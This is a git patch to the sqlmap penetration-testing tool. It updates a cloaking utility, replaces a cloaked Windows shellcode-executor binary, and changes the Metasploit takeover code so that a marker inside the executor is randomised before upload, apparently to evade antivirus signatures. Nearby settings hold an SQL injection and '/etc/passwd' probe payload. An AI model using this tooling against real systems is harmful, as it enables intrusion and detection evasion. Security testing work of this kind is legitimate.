From 265a78b455e7e1d234d7332860e18688b8daa5c5 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 31 Aug 2015 14:27:47 +0200
Subject: [PATCH] Fixes #1379

---
 extra/cloak/cloak.py                          |  20 ++++++++++--------
 .../windows/shellcodeexec.x32.exe_            | Bin 2972 -> 2758 bytes
 lib/core/settings.py                          |   3 +++
 lib/takeover/metasploit.py                    |  12 +++++++++++
 4 files changed, 26 insertions(+), 9 deletions(-)

diff --git a/extra/cloak/cloak.py b/extra/cloak/cloak.py
index a94f6756f..9f220088a 100755
--- a/extra/cloak/cloak.py
+++ b/extra/cloak/cloak.py
@@ -24,18 +24,20 @@ def hideAscii(data):
 
     return retVal
 
-def cloak(inputFile):
-    f = open(inputFile, 'rb')
-    data = zlib.compress(f.read())
-    f.close()
+def cloak(inputFile=None, data=None):
+    if data is None:
+        with open(inputFile, "rb") as f:
+            data = f.read()
 
-    return hideAscii(data)
+    return hideAscii(zlib.compress(data))
 
-def decloak(inputFile):
-    f = open(inputFile, 'rb')
+def decloak(inputFile=None, data=None):
+    if data is None:
+        with open(inputFile, "rb") as f:
+            data = f.read()
     try:
-        data = zlib.decompress(hideAscii(f.read()))
-    except:
+        data = zlib.decompress(hideAscii(data))
+    except Exception:
         print 'ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile
         sys.exit(1)
     finally:
diff --git a/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ b/extra/shellcodeexec/windows/shellcodeexec.x32.exe_
index 4d699f1237a7e9a93f6e1a8417afe2bf2a311ed7..c4204cce6a9c8a12e850cd70436a0ec5b650ab7b 100644
GIT binary patch
literal 2758
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
Mc%R1nKvYM|*Jm_pTL1t6

literal 2972
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
S_O`b4;M)B2&HsArmJnxle8h_Y

diff --git a/lib/core/settings.py b/lib/core/settings.py
index 2989907ea..303c10cf4 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -443,6 +443,9 @@ BRUTE_COLUMN_EXISTS_TEMPLATE = "EXISTS(SELECT %s FROM %s)"
 # Payload used for checking of existence of IDS/WAF (dummier the better)
 IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd"
 
+# Data inside shellcodeexec to be filled with random string
+SHELLCODEEXEC_RANDOM_STRING_MARKER = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
+
 # Vectors used for provoking specific WAF/IDS/IPS behavior(s)
 WAF_ATTACK_VECTORS = (
                         "",  # NIL
diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py
index 8717b6c73..8befc81ca 100644
--- a/lib/takeover/metasploit.py
+++ b/lib/takeover/metasploit.py
@@ -8,10 +8,13 @@ See the file 'doc/COPYING' for copying permission
 import os
 import re
 import sys
+import tempfile
 import time
 
 from subprocess import PIPE
 
+from extra.cloak.cloak import cloak
+from extra.cloak.cloak import decloak
 from lib.core.common import dataToStdout
 from lib.core.common import Backend
 from lib.core.common import getLocalIP
@@ -34,6 +37,7 @@ from lib.core.exception import SqlmapFilePathException
 from lib.core.exception import SqlmapGenericException
 from lib.core.settings import IS_WIN
 from lib.core.settings import METASPLOIT_SESSION_TIMEOUT
+from lib.core.settings import SHELLCODEEXEC_RANDOM_STRING_MARKER
 from lib.core.settings import UNICODE_ENCODING
 from lib.core.subprocessng import blockingReadFromFD
 from lib.core.subprocessng import blockingWriteToFD
@@ -640,6 +644,14 @@ class Metasploit:
 
         if Backend.isOs(OS.WINDOWS):
             self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, "windows", "shellcodeexec.x%s.exe_" % "32")
+            content = decloak(self.shellcodeexecLocal)
+            if SHELLCODEEXEC_RANDOM_STRING_MARKER in content:
+                content = content.replace(SHELLCODEEXEC_RANDOM_STRING_MARKER, randomStr(len(SHELLCODEEXEC_RANDOM_STRING_MARKER)))
+                _ = cloak(data=content)
+                handle, self.shellcodeexecLocal = tempfile.mkstemp(suffix="%s.exe_" % "32")
+                os.close(handle)
+                with open(self.shellcodeexecLocal, "w+b") as f:
+                    f.write(_)
         else:
             self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, "linux", "shellcodeexec.x%s_" % Backend.getArch())